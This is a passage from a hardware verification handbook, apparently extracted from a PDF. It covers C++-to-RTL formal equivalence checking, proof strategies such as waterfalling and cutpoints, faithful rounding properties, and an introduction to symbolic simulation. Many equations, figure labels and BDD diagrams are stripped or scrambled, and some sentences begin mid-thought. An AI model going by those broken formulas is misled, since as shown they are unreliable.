name and hence can map the equivalent points across spec and implementation.
Depending on the methods of solving the problem either running some sample
dynamic simulations or semi symbolic checks or full blow symbolic verification,
these mappings help in constraining the problem. There are various kinds of
mappings which may be required such as the following:
(a) Primary inputs: Either “map-by-name” or explicit mapping the signals
between the wrapper on C module and primary inputs of RTL.
(b) Primary outputs: Again, these could be “map-by-name” or explicit mapping
the primary outputs.
(c) Undrivens: Formulating the full problem for analysis needs driving all signals
and some cases would need explicitly driving some signals with X/Z/discrete
values.
(d) Cutpoints: At times, there are signals in RTL which are not present as input
in C++/SystemC code. They may be instantiated in C++ as global/static
35 High-Level Formal Equivalence 1251
(c) Latency
C++ is untimed. A wrapper written on top of it, if written in SystemC, often
is treated as a 1 cycle delay. However, RTL can have variable latency. That
latency needs to be provided in the equivalence either as a fixed value or in
terms of constraints dependent on some signal (such as output_dv, etc).
(d) Throughput
In a stable state, one should be able to determine the frequency of incoming
data such that design is able to output data at the same frequency. There may
be a situation where to avoid interaction bugs, the pipeline only accepts one
input every n number of cycles; this constraint needs to be provided to avoid
spurious counterexamples.
(e) Clock, reset, and env constraints
The clock signals, behavior of resets, behavior of non-resettable flops in
case of some designs, and other environment constraints which are part of
peripheral logic driving the datapath algorithm such as enable signals, hold
signals, dv, etc. need to be defined. To cite an example, in case of execution
unit, one needs to clearly state that only one operation can be done at a time.
(f) Constants, tie offs
There may be additional signals driving the RTL circuit which do not have
any impact on actual algorithmic implementation or which need to be driven
to a constant value. This is true in case of C++ as well where they may be if-
then-else conditions which need to be driven in a certain manner to drive the
correct logic. For example, let us suppose code in C++ has an if statement
to drive either a multiplication algorithm or an FMA algorithm in a single
function. To prove this function against an FMA RTL, one needs to tie off
the if condition in C++ to a fixed value driving FMA path. These tie offs are
also useful to constrain the environment in case of huge designs with various
paths with aim of achieving convergence using case splitting which would
be elaborated later.
(g) Transactors/BFMs/master mode abstractions/checker BFMs
These are specific transactors for formal environment. Modeling extra logic
to align the signal level details between HLM and RTL implementation. It
is strongly advisable to mimic the logic as BFM/transactors. For example,
a signal pre-dv is defined in RTL which comes a signal before the dv
signal and related data input in the implementation, while the specification
in C++ would define the dv signal at the interface. It is recommended to
write a transactor to model this instead of complicating the assumptions.
There would be even more complex relations across various signals and
hence transactors/abstraction models are preferred to model these relations.
Transactors can also be used on the output interfaces to model such complex
relations on the output side similar to the input interface assumptions and are
called as checker abstractions/BFMs.
35 High-Level Formal Equivalence 1253
8. Blackboxing
There may be modules in both C++ and RTL which may be either non-formal-
friendly or not required for actual algorithm and would hamper convergence
efforts. Such modules or functions can be chosen to be blackboxed in most
formal verification equivalence tools using ignore functions or blackbox com-
mands. Blackboxing modules after proving them is also a neat method of
achieving convergence on a huge design which would be explained in this
chapter.
9. Assertions for proofs
The final check on equivalence is that given the mappings between inputs and
outputs and the correct set of constrained environments, the final outputs should
match between the spec and the imp at the appropriate latency mentioned. The
verification engineer can also write additional lemmas for sanity of the RTL
code such as to check the expected outcome on output control signals such as
output_dv, output_hold, and flags.
There may be bypass cases not covered in C++ which can be simply
checked in verification tool with assertions such as if certain bypass condition
in RTL is true, output is equal to input, etc.
In addition, once the setup is ready, properties can be written only on the
C++ as well to ensure design intent. For example, if an architect expects
that output of an algorithm can never be negative or any intermediate signal
is always within a certain range, then properties can be written only on C++ to
validate the desired intent. In case of fixed precision numbers, properties can be
written to check the error range with floating point numbers as well.
10. Verification
(a) Dynamic quick checks (2 valued vs 3 valued)
All formal verification tools are equipped with a constrained random
simulator to quickly ascertain the sanity of both C++ and RTL design and
ensure that there are no simple bugs in the design. The simulator is run
even before formal model is compiled. This gives formal tools an edge over
simulation tools in terms of speed and efficiency. The tools can run 2 valued
simulation or 3 values simulation while the formal proof is being done.
(b) Full proofs
FV tools are equipped with various engines. The brute force resorts to using
SAT/SMT solvers and BDD-based engines. For more complex algorithms,
most tools have specific engines to deal with different algorithmic variations
such as bit wise operations, multiplication, shift operations, etc. These
engines are equipped with various word level solvers to cater to specific
problems.
For example, there may be multiplier implemented in RTL with different
optimized algorithms such as booth multiplier, partial products, radix
multiplication, and Wallace tree multiplication.
1254 T. Drane and M. V. A. Kiran Kumar
FINAL OUTPUT
Compare
Represents with C++ output
Verify stage 1
4 Stage 0 output: only if none of
output, assume
multiplication Verify via C++-RTL the stage are
stage 0 to be
bypassed
correct
One problem associated with using cutpoints is that the signal is now
driven as being symbolic, so if there were any constraints to be associated
with this signal which are necessary, it is needed to now separately
constraint them to avoid spurious examples. For example, if due to driving
logic, let’s say that the signal always had upper 3 bits as zero (RTL/C++
designer chose extra bit widths to accommodate for future projects), then
this needs to explicitly marked this constraint.
Finding such constraints is difficult as designs are also often not aware
of how internal signals should be constrained. One workaround for such
cases is to add cutpoint only in either SPEC or IMP, whosoever logic is
more involved, that way one gets reduced state space from the circuit where
the cutpoints are added to get correct constraints from the circuit where the
cutpoints weren’t present.
Cutpoints are also useful to enable blackboxing some functions which are
non-formal-friendly such as log in C++; it is recommended to first prove
that input to log function matches some intermediate signal in RTL. Then,
add a cutpoint at the output of log function and map it to the output of log
look up table (standard) of RTL. This helps to bypass log and still claim
end-to-end convergence.
(e) Dynamic weakening
This technique helps to guide the tool regarding the signals which are not
expected to be in cone of logic and can be ignored. This speeds up the
process of convergence.
(f) Assume guarantee
Assume guarantee is a technique to prove intermediate points in the 2
designs and assume them for further proofs. Adding all assertions as
assumptions can lead to a huge state space preventing convergence in some
cases for simple proofs. Hence, most tools have advanced assume guarantee
techniques to choose logic to prove through this technique and a choice to
choose which assertions must be treated as assumes.
Convergence: Once all failures are resolved, one may face convergence
issues because of huge gate count of design. This requires specialized
treatment using path analysis, cutpoints, etc., and FV team adds those
features to close the verification process. Formal guarantees 100% coverage
for datapath algorithm which attracts all people involved.
13. Bug hunting
When it is hard to achieve 100% convergence such as for very complex designs
such as compression, then it is recommended to run formal in bug hunting
mode. Bug hunting involves taking a dynamic symbolic simulation run to bring
the design state to a certain point and then start formal proof from that state.
This allows for some deeper bound testing.
14. Coverage
(a) Case splits coverage
(b) Data space coverage
(c) Assumption coverage
(d) Interesting data cross coverage
35 High-Level Formal Equivalence 1257
15. Regressions
Once an algorithm is proven, it is important to enable regression setup such that
for every minor change in C++/RTL, testing is automated. This allows the user
to only look at the setup again in case there is a failure in future revisions.
It only spits one counterexample at a time rather than pointing all issues at once,
which is the fundamental premise of formal. However, sometimes designers who
have been dealing with only simulation may find it to be a limitation.
Given that there are infinitely many logic designs that perform the same function but
a finite number of automated formal verification solvers and strategies, inconclusive
proofs are, at some level of design complexity, inevitable. Designs that once were
conclusive can easily fail to be so once RTL engineers invent novel ways of
optimizing hardware performance. Quality RTL development and improvement
must go hand in hand with encountering and managing inconclusive equivalency
checking proofs.
While there are standard techniques for attempting to overcome these challenges;
through case splitting, black-boxing, cutpoints, or using different solve scripts,
they provide no guarantee of success. Resolving inconclusive proofs may require
these techniques but managing inconclusive proofs requires a different approach.
Simulation-based verification gains confidence in its results with every passing
computation; equivalency checking may not, as techniques such as case splitting
will never achieve proof (unless the input domain is trivial in size). How can
managers force and guarantee progress on inconclusive proofs?
While exhaustive simulation at a bit level typically exceeds years for any
sufficiently valuable datapath design, an approach that reasons at an operator level,
i.e., integer operations, exponentially reduces the problem. Moreover, reasoning at
an operator level matches how RTL designers reason about their implementations.
While case splitting may resolve inconclusiveness, the only guaranteed approach is
for the formal verification engineer (verifier) to dive into the two designs and work
their way toward understanding why the two designs are equivalent. The practical
way to do this is to build a set of equivalent RTLs or system level models from the
specification design S and implementation I:
S ⇐⇒ S1 ⇐⇒ S2 . . . ⇐⇒ Sn Im ⇐⇒ . . . I2 ⇐⇒ I1 ⇐⇒ I (1)
operators into their word level equivalents, etc. This level of white box knowledge
will invariably require input from the creators of S and I or understanding the
algorithms that produced them if auto generated.
This waterfalling approach is intensive but it will provide deep design under-
standing and force the verifier to understand which nature of design rewrites are
provable by the equivalency checker tool. Note that progress is made with every
step and even duration of subtasks of this process can be estimated. Ultimately a
point will be reached of the form:
• Blackbox – use cutpoints to isolate the differing parts of the designs and then
apply case-splitting on that region.
• Extreme Waterfalling – introduce additional intermediate designs with even
smaller axiomatic rewrites.
• Human Sign Off – formal verification is the act of risk mitigation not elimina-
tion, formal verification tools can return false positives. Time-bound verification
effort may force the verifier to personally sign off on the correctness of a
particular transformation.
• Generate Supporting Evidence – explore other methods to provide evidence,
e.g., reducing the bit width of certain internal variables may provide evidence that
the architecture of the design is correct (this can actually result in a full proof in
certain cases (Shekhar et al. 2008)).
n−1
a∗b+a∗c = 2i (ai ∗ b + ai ∗ c) (3)
i=0
Whether this transformation is or is not tool provable for a given tool and version
is irrelevant, the verifier must be able to break this nature of transformation down
into smaller axiomatic steps, e.g.:
Note that the right-hand side of Eq. 4 mixes bit and word-level representations
of a and thus provides an intermediate design point for the transformation in Eq. 3.
If Eq. 4 cannot be tool proven, this transformation can be further broken down into
associativity and distributivity properties of multiplication and addition.
The crucial element is the generation of new intermediate steps, and these are the
moments when those managing but not performing formal verification activities can
provide invaluable direction.
In summary, waterfalling, creating multiple intermediate designs, provides a
way to guarantee progress when formally verifying complex datapath designs.
This forces intellectual understanding of the designs as well as the equivalency
checking tools. This approach comes from basic manager questions, Why is this
hard? What are the differences between these designs? How to shrink this problem?
Show the pain points in this verification. How can one overcome them? These
questions forcibly splinter the problem into its core constituent inconclusive proofs.
Ultimately, they rest on the power of the equivalency tool to perform arbitrary bit
width axiomatic rewrites. Once managers know the limits of the tool’s capability in
this area, they know what is and is not theoretically possible to prove by equivalency
checking. This approach also removes the equivalency tool R&D from the critical
path of any equivalency checking project. Formal verification teams must store
these fundamental inconclusive proof problems, engage with the tool R&D on
their resolution, and find solutions within the verification team before they become
critical.
As formal verification teams working on equivalency checking evolve, they may
even be able to get intermediate designs from the RTL or system level modelers
themselves. Advanced RTL design teams may use waterfalling as part of their RTL
design phase, shrinking design, and verification schedules.
While the equivalency tools certainly keep improving, waterfalling provides an
approach to control, focus, and even schedule the work required to overcome highly
complex inconclusive equivalence checking problems.
Accuracy Challenges
regarding algorithm level accuracy. Consider the simplest of fixed point and floating
point designs in Fig. 5.
The left-hand side design is fixed point with a 32-bit fractional datatype used
throughout, denoted 0.32. The right-hand side design is floating point with a single
precision IEEE 754 datatype used throughout, denoted F 32. The most accurate
components that can be created would use round to nearest, ties to even, also known
as correct rounded, for their rounding mode (a full explanation of rounding modes
is provided in Table 1). However, it is worth noting the accuracy of these trivial
designs when using the most accurate components.
For the fixed-point design, consider the following implementation result, where
׈ denotes the round to nearest, ties to even fixed-point multiplication operation:
Combining two such components has resulted in an error which is nearly 2−32 .
The implementation returns 0.1, whereas a correct rounding of the infinitely precise
result would return 0.011 . . . 111. As expected, combining two correctly rounded
components does not result in a correctly rounded result.
35 High-Level Formal Equivalence 1263
Implementation : 224 +̂1 +̂ −224 = 224 +̂ −224 = 0 (8)
Then which of the two outputs to be used is defined by the rounding mode as shown
in Table 1.
One could ask which of these rounding modes should be used for the reference
model or the implementation. Also note that each of these rounding modes will have
a different hardware implementation cost. Moreover the two round to nearest modes
should be more expensive to implement in hardware than the other three, as their
worst case error is half that of the others. Each of these rounding modes chooses
between F1 and F2, either is a legitimate directed rounding. These five rounding
modes are all examples of a faithful rounding which is defined in Table 2:
1264 T. Drane and M. V. A. Kiran Kumar
equivalency checking between the system model and the RTL provides significant
evidence of correctness.
Therefore, in order for RTL designers to make use of the hardware benefits
offered by accuracy optimized components, non-standard verification techniques
need to be employed. Moreover, the only evidence that can be provided of
correctness will come from these non-standard techniques. These techniques use
equivalency checkers to perform Datapath Property Checking.
values are returned (yRTNI and yRTPI , respectively). The implementation that is
designed to be a faithful rounding (FR Impl) returns yFR . The lemma that should
then be given to the equivalency checker that proves faithful rounding is then in
Eq. 11.
Equivalency checkers are able to prove such properties in practice; in (Drane and
Jain 2012), a double precision floating point multiplier was proven to be faithfully
rounded in under 2 hours on a 1.86 GHz Intel Xeon® machine.
Proving Monotonicity
While faithful rounding has no worse error than the set of directed rounding modes
and can provide significant hardware benefits, it is not enough to prove only the
faithful rounding property. Loosening the accuracy from directed rounding to a
faithful rounding inadvertently runs the risk of violating unspoken assumptions
about arithmetic components. Beyond proving the faithful rounding property, the
verifier will have to consider all arithmetic dangers faithful rounding (or looser
accuracy statements) may introduce, updating specifications and proving additional
properties in the process.
Consider this trivial arithmetic property:
1 1
0<a<b⇒ < (12)
b a
1 1 1 1
F1 = + 2−24 < −23
< −23
< + 2−23 = F 2 (14)
2 2−2×2 2−3×2 2
Here the reciprocal of 2 − 2 × 2−23 and 2 − 3 × 2−23 lie between F1 and F2. By
the definition of faithful rounding, one may choose:
1
a = 2 − 3 × 2−23 and recipF R(a) = + 2−24 = F 1 (15)
2
1
b = 2 − 2 × 2−23 and recipF R(b) = + 2−23 = F 2 (16)
2
These assignments result in the situation described in Eq. 13, and recipFR is an
increasing function for these inputs. Faithful rounding allows for the creation of
35 High-Level Formal Equivalence 1267
where recipFR(NEXT (x)) would be a design which first computes the adjacent more
positive input to x and then computes the faithfully rounded reciprocal. Equivalency
checkers are able to prove such properties in practice; in (Drane and Jain 2012),
a single precision floating point reciprocal was proven to be monotonic in under
20 minutes on a 1.86 GHz Intel Xeon® machine.
Proving Commutativity
Unfortunately, faithful rounding can also violate a far more common property,
commutativity. It is possible for the following to occur:
To see how this can happen, consider the following faithful rounding of an unsigned
two-bit multiplication
x [1 : 0] × y [1 : 0]
x×y x×y
RT NI ≤ multF R (x, y) ≤ RT P I
4 4
xy xy + 3
≤ x [1] (y [1] + y [0]) ≤ (20)
4 4
Equation 20 can be trivially checked to hold for all possible values of x[1 : 0] and
y[1 : 0]. The bounds on multFR(x, y) are symmetric in x and y, but this particular
faithful rounding implementation is not. In particular:
References
Drane T, Jain H (2012) Property checking of datapath using word-level formal equivalency tools.
In: Design and Automation Conference (DAC) User Track
Shekhar N, Kalla P, Meredith MB, Enescu F (2008) Simulation bounds for equivalence verification
of polynomial datapaths using finite ring algebra. IEEE Trans Very Large Scale Integr Systems
16(4):376–387
Verification of Arithmetic and Datapath
Circuits with Symbolic Simulation 36
Roope Kaivola and John O’Leary
Contents
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1270
Symbolic Simulation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1270
Symbolic Simulation as Formal Verification . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1271
Symbolic Simulation Among Formal Verification Methods . . . . . . . . . . . . . . . . . . . . . . . . 1272
Chapter Outline . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1274
Simulation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1275
Booleans and Undefined Values . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1275
Circuit Simulation and Undefined Values . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1276
Mathematical Model of Circuit Simulation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1279
Circuit Properties . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1281
Mathematical Model of Circuit Properties . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1282
Symbolic Simulation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1283
Symbolic Computation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1283
Simulation with Symbolic Values . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1284
Mathematical Model of Symbolic Simulation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1287
Practical Considerations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1288
Simulation Scope Control . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1289
Property Triggers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1289
Scope Reduction by Triggers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1293
Reachable-State Invariants . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1295
Intel provides these materials as-is, with no express or implied warranties. Intel processors might
contain design defects or errors known as errata, which might cause the product to deviate from
published specifications. Intel, Intel Core, Intel Atom, Pentium and Intel logo are trademarks of
Intel Corporation. Other names and brands might be claimed as the property of others.
Abstract
Keywords
Introduction
Symbolic Simulation
Digital circuit simulation is a standard tool in the arsenal of every working logic
design and validation engineer. Symbolic simulation extends this technology with
36 Verification of Arithmetic and Datapath Circuits with Symbolic Simulation 1271
the ability to carry out a simulation with sets of values in a single simulation
trace, using symbolic representations. This chapter provides a pragmatic high-
level introduction to symbolic simulation and its usage in formal verification of
hardware designs, both in the conceptual level and in practice over the last decades.
Its intended audiences are working validation or formal verification engineers and
validation managers. The chapter also gives a mathematically precise outline of the
foundations of the method.
A traditional circuit simulator takes as its inputs a circuit design and a stimulus
trace assigning values to some or all input nodes of the circuit for given time periods.
The tool simulates the circuit’s behavior with the given stimulus for a required
number of clock cycles and produces a simulation trace, assigning values consistent
with the circuit structure and the stimulus to all the signals in the circuit and all the
time points relevant to the trace. For validation purposes, the simulation trace may
be connected to external checkers probing signals in the trace and observing that
their values are consistent with some external notion of correctness. Alternatively,
the circuit itself may contain embedded checkers, which are evaluated in the natural
course of the simulation.
In a symbolic simulator, the input stimulus may contain symbolic variables in
addition to the traditional concrete Boolean values 0 and 1. These symbolic variables
are effectively names of values, denoting sets of possible concrete values. The
values of the internal signals computed in the simulation are then structural logical
expressions on the symbolic variables on the inputs. For example, in a bit-level
symbolic simulator, a single symbolic variable a corresponds to the set of Boolean
values consisting of both 0 and 1, and if stimulus to a symbolic simulation trace
contains the variables a, b and c, the internal signals might carry values like a ∨ b
or a ∨ (b ∧ ¬c). Section “Symbolic Simulation” provides more thorough examples
of symbolic simulation.
A single symbolic simulation trace corresponds to a set of ordinary simulation
traces, covering behaviors of the simulated circuit for all possible instantiations of
the symbolic variables with concrete values. This universality connects symbolic
simulation to formal verification.
This chapter focuses on discrete bit-level simulation of digital circuits with well-
defined clocks using a zero-delay circuit model. In this model, all combinational
logic gates are computed without any gate delay, and all sequential logic gates, i.e.,
flip-flops and latches, change values instantaneously on clock edges. The model is
at the same time simple and strong enough to capture all logic-level correctness
aspects of circuits.
It has a unique ability to carve out the circuit logic relevant to the progression of a
pipeline while ignoring the rest of the circuit and other transactions in flight.
As the approach is conceptually simple and concrete, it gives the human verifier a
fine-grained visibility into the progress of the computation during a verification task,
enabling precise analysis and mitigation of computational complexity bottlenecks.
Because of these advantages, symbolic simulation can routinely handle circuits that
are beyond the capacity of traditional model checkers, as well as circuits where the
pipelines are too enmeshed to allow equivalence-based verification. On the other
hand, symbolic simulation is less well suited for verification of general inductive
safety properties, or circuits involving significant feedback loops, as it provides no
automatic mechanism for reachable state analysis, a staple of the traditional formal
model checking methods. Further, liveness properties cannot be directly addressed
by symbolic simulation, as they require reasoning over infinite traces, and symbolic
simulation inherently focuses on finite behaviors.
Symbolic simulation has been the primary vehicle for Intel arithmetic formal
verification for over 20 years. Most arithmetic execution engines of Intel processor
designs over this period have been exhaustively verified using it. While the verifica-
tion of the hardest operations requires great expertise and insight, the overwhelming
majority of arithmetic operations commonly implemented in hardware can be fully
verified with direct symbolic simulation with little user interaction.
Symbolic simulation for circuit verification was introduced in the form of
symbolic trajectory evaluation (STE) by Seger and Bryant in (1990, 1995), and the
related methodology was elaborated in more detail in Jones et al. (2001) and Seger
et al. (2005). In this chapter, as well as in actual verification practice, the original
theory of STE is extended by admitting a larger class of properties (Kaivola et al.
2009; O’Leary et al. 2013): all fixed time window properties built with arbitrary
Boolean combinators are covered, whereas STE in its basic form restricts itself to
verification of implications between conjunctions of direct signal references.
Several other technologies address the same problem space as symbolic simulation:
All of these technologies are implemented in a variety of academic tools and the
first two in several commercial ones as well.
36 Verification of Arithmetic and Datapath Circuits with Symbolic Simulation 1273
Symbolic Simulation and Theorem Proving Both symbolic simulation and the-
orem proving are human-driven, computer-assisted processes. The main difference
is the extent and nature of the human intervention required. Traditional computer-
assisted theorem proving both allows and often requires human guidance over the
minutest details of the verification, and this guidance often reflects the flow of the
theorem prover, not the circuit (cf Russinoff 1998, 2019). Symbolic simulation,
on the other hand, allows users to let automation gloss over many design details,
which is particularly useful in highly optimized bit-level designs. Also, most of
the human guidance can be understood in terms of the flow of information in the
circuit, making the technology more accessible than theorem proving. As discussed
later in the chapter, symbolic simulation can be combined with theorem proving
for problems that exceed the capacity of pure simulation. However, this reasoning
typically takes place at a level of mathematical relations, not at the gate level.
Chapter Outline
Simulation
The most fundamental element of the circuit model used in this chapter is a combi-
national Boolean gate. In modelling these, the usual set of Booleans is extended with
a special undefined value X, denoting lack of information (Definition 1). The value
X means intuitively that it is not known whether a value is 0 or 1. As customary, the
dual of X, the overconstrained value is also added. However, is rarely used in
verification practice, and we do not discuss it further.
Note that the value X is a modeling abstraction. It refers to knowledge about
a signal value, not to any electrical phenomena that would correspond to a signal
value distinct from 0 or 1. At an underlying concrete level, every signal value at
every time in an actual circuit behavior is expected to be strictly Boolean, either
0 or 1. Common Boolean operators can be naturally extended to cover X values
as depicted in Fig. 1, reflecting the intuition that X denotes an undefined or don’t-
know value. Such extensions are called monotonic (Definition 2). The same concept
is known as X-pessimism in digital circuit literature.
The key feature of the X-abstraction and monotonic extensions is that if a
function is computed using its monotonic extension for an argument list that
contains X’s and the result is a Boolean value of 0 or 1, then the argument X’s
can be replaced with any combination of 0s and 1s, and the result remains the same
X X X
X 1 X
X 1 0
1276 R. Kaivola and J. O’Leary
(Lemma 1). This gives us the ability to compute the function only once and establish
the result for multiple different concrete arguments. For example, from the single
computation X ∧ 0 = 0, it can be concluded that both 0 ∧ 0 = 0 and 1 ∧ 0 = 0.
Definition 1. We write B for the set of Booleans {0, 1}. Let X be the set {0, 1, X, }
extending B by the undefined value X and the overconstrained value . We define
the relation ⊂ X × X as the minimal relation that satisfies X b, b b, and
b for all b ∈ X. If bx b, we say that bx abstracts b. For b, b ∈ Xk , we write
b b if bi bi for all i, where b = (b1 , . . . , bk ) and b = (b1 , . . . , bk ).
For any sets A1 , . . . , An and functions f, f : A1 → . . . (An → X), we write
f f if f (a1 ) . . . (an ) f (a1 ) . . . (an ) for all (a1 , . . . , an ) ∈ A1 × . . . × An .
Consider the simple pipelined adder circuit in Figs. 2 and 3. The design intent of
the circuit is the computation of 8-bit or 16-bit addition in three pipestages B, C,
and D. Data inputs are read from buses datainB[1] and datainB[2] in pipestage
B, the actual computation takes place a cycle later in pipestage C, and the result
is produced at the output bus sumD another cycle later in pipestage D. The input
valid signal avldB is staged along with the data, and the input control signal add8B
chooses between 8-bit and 16-bit addition. The expected behavior of the circuit add
could be captured by properties such as add8ok in Fig. 4.
The most basic usage model of a traditional simulator in circuit validation is
a single targeted test. The circuit add could be tested by generating stimulus and
add
avldB avldD
add8B sumD
datainB[1] +
datainB[2]
aclk
pipestage B C D
Fig. 2 Adder circuit schematic
36 Verification of Arithmetic and Datapath Circuits with Symbolic Simulation 1277
bit avldC, add8C; bit [15:0] datainC[2:1], mskC, datamskC[2:1], sumrawC, sumC;
‘FF( avldC, avldB, aclk ); ‘FF( add8C, add8B, aclk ); // flop pipestage B->C
‘FF( datainC, datainB, aclk );
assign mskC = {{8{˜add8C}}, 8’hFF}; // build mask
assign datamskC[1] = mskC & datainC[1]; // mask data
assign datamskC[2] = mskC & datainC[2];
assign sumrawC = datamskC[1] + datamskC[2]; // add masked data
assign sumC = mskC & sumrawC; // mask sum
‘FF( avldD, avldC, aclk ); ‘FF( sumD, sumC, aclk ); // flop pipestage C->D
endmodule
0 1 2 3 4 5
aclk
avldB
stimulus
add8B
datainB[1][15:0] 0 h002f 0
datainB[2][15:0] 0 h0017 0
response
avldD
sumD[15:0] 0 h0046 0
We do not formalize the relation between the source code for a circuit and the
mathematical model (in Definition 4 below), expecting the combinational gate
functions, known as the gate excitation functions, to be self-evident monotonic
extensions of common logical constructors, along the lines of Fig. 1. At the level
of digital zero-delay modelling, all types of latches and flip-flops can be expressed
in terms of combinational logic and delay signals, the basic building blocks for the
model.
Circuits are assumed to be powered up in an unconstrained state and initialized
by a reset sequence, typically by asserting a reset signal for some length of time. The
instantaneous state of a circuit execution is modelled by an assignment of values to
circuit signals (Definition 5) and the temporal dynamic behavior of a circuit by a
finite or infinite sequence of states (Definition 6).
By applying the concept of monotonic extensions to the circuit gate functions,
the set of values handled by simulation can be extended with the undefined value X,
allowing stimulus that has Xs in addition to 0s and 1s. Note that an undefined value
X in the stimulus does not mean that the user has not specified the value and the
simulator picks either 0 or 1 randomly. It means that the signal is assigned the special
value X, distinct from 0 and 1, and this value propagates through the gates of the
circuit in the simulation according to rules like those in Fig. 1, resulting in internal
and output values that may be either 0s, 1s, or Xs. Crucially, the monotonicity
property of these rules then guarantees that every output signal that has a 0 or 1
value in the simulation has the same value in every simulation where the stimulus
Xs are replaced with any combination of 0s and 1s. In this way, a single simulation
trace with some undefined stimulus values X corresponds to a set of Boolean traces,
and we gain knowledge about all these concrete traces with the cost of only a single
simulation (Theorem 1).
For example, consider the stimulus and trace in Fig. 6, similar to Fig. 5, except
that the stimulus associates X instead of 0 with signals and times other than the
controls and the 8-bit input data for the main operation of interest. Assume also that
this time, the simulator is started from a state where all state elements are Xs. From
the waveform in Fig. 6, we can conclude that the circuit adds the two given 8-bit
numbers correctly no matter what the preceding or following control or data signal
values were, i.e., that there are no interferences between operations in successive
cycles and that the result of the 8-bit addition operation is not affected by the high-
input data bytes, a stronger statement than in the case of the Boolean simulation
in Fig. 5.
36 Verification of Arithmetic and Datapath Circuits with Symbolic Simulation 1279
0 1 2 3 4 5
aclk
avldB
stimulus
add8B
datainB[1][15:0] hXX2f
datainB[2][15:0] hXX17
response
avldD
sumD[15:0] h0046
Definitions 3, 4, 5, and 6 capture the circuit modelling intuition described above. The
model determinism requirement in Definition 5 is used to exclude mathematically
possible models that do not correspond to meaningful circuit designs. Determinism
could be violated, for example, by inconsistent or isolated combinational loops, but
such circuits are not considered well-formed designs in the first place. Theorem 1
then states the basic result that simulation traces computed using undefined values
and monotonic extensions of the gate functions are abstractions of concrete circuit
traces.
Definition 3. We write N for the set of natural numbers {0, 1, . . .} and [n] for the
set {i ∈ N | i < n} for every n ∈ N. If S is a set and n ∈ N, a finite sequence
of length n over S is a function s : [n] → S, and an infinite sequence over S is
a function s : N → S. We denote the set of all finite sequences over S by S . If
s ∈ S , the length of s, denoted len(s), is the value n such that the domain of s is
[n]. If f : A → B is a function, and A ⊆ A, we write f |A for the restriction of f
to A , i.e., the function identical to f but restricted to domain A .
Circuit Properties
Conceptually, circuit properties are predicates that for every trace and every point
of a trace are either true or false at that point. They can be modelled by functions
that map traces to sequences of truth values. A multitude of formalisms exists for
describing circuit properties, for example different temporal logics. In the examples
of this chapter, properties are written as SystemVerilog Assertions (SVA) (IEEE
standard for SystemVerilog–unified hardware design 2018). As with circuits, we
do not formalize the relation between the SVA source code and the mathematical
property, expecting the relation to be self-evident for the common constructors.
Symbolic simulation targets a simple yet very useful set of properties, fixed
time-window invariants, defined as the minimal set that contains all direct signal ref-
erences and is closed under fixed time offsets and Boolean operators (Definition 7).
In traditional linear temporal logic terms, this set coincides with the set of formulas
built from atomic propositions, Boolean operators, and “next-time” and “previous-
time” temporal operators, wrapped in a single “always” operator. The example SVA
properties in this chapter use only direct signal references, Boolean operators, the
“$past” temporal operator, and the overlapping implication operator |−> without a
time delay.
When determining the validity of a property over a circuit, only Boolean traces
are considered, reflecting the intuition that the underlying reality that is modelled
is Boolean and that the use of the undefined value X is a modelling artifact. The
initialization phase of traces is also explicitly ignored: Only states after initialization
count for the validity of a property (Definition 7).
Simulation using the undefined value X allows us to validate a universal invariant
property based on a single instance of it. In other words, if a property holds at one
fixed time with a fixed stimulus trace starting from a maximally undefined state, then
the same property holds in every time point of every trace of the circuit, as long as
the trace agrees with the Boolean 0 and 1 values present in the stimulus (Theorem 2).
Note that it is essential to the argument that the simulation trace validating a property
starts from an unconstrained state. The reset sequence and circuit initialization play
no role in the consideration. The downside of this aspect is that the property is
analyzed over a wider set of behaviors than necessary, including traces that are not
properly initialized.
Returning to the example circuit add in Fig. 3, by iterating over the 216 possible
input data values and repeating the simulation in Fig. 6, complete correctness of the
circuit for the 8-bit addition operation could be established, validating the property
add8ok of Fig. 4 at all points of all possible traces of the circuit.
1282 R. Kaivola and J. O’Leary
Proof. Take any Boolean trace T and t ≥ rstlen such that T , t |= char(T ). Let
T be the suffix of T starting from point t . Then T , 0 |= char(T ), implying
T stim(T ) by Lemma 3. As UND start(T ), then T , t |= P by Lemma 2,
hence T , (t + t) |= P and T , t |= P @t.
Symbolic Simulation
Symbolic Computation
1
a 0 a
1 0
a|(b&~c)
1
b 0
1 0
b a
b&~c 0
~c 1
b
c 1 0
1 0 b
c 0 1
1 0 c 1
1 0 0
1 0
c c 1
0 1 0
1 0
There are several different techniques for representing symbolic Boolean expres-
sions as graph data structures. The key aspects of any such technique are the size
of the representation and the efficiency of computing the lifted Boolean operations
directly on the representation.
The most traditional approach uses binary decision diagrams (BDDs) (Bryant
